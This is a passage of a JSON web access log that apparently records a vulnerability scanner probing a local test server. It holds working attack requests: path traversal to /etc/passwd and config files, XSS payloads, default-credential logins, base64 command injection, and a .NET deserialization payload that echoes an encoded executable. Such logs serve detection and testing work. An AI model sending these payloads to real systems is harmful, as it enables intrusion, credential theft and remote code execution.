Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /healthz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAnh5z2wq3tqPyxLhOvkp8ZuV.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"{\x22userName\x22:\x22admin\x22,\x22password\x22:\x22cs141-snmp\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /centreon/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"action=wpcf7r_get_nonce¶m=wp_rest","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/start/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"{\x22userName\x22:\x22engineer\x22,\x22password\x22:\x22engineer\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yarn.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /website/lang/en_US?r=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229KAnr5jvs8d1tW3OaotH2C8bvV\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:14 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ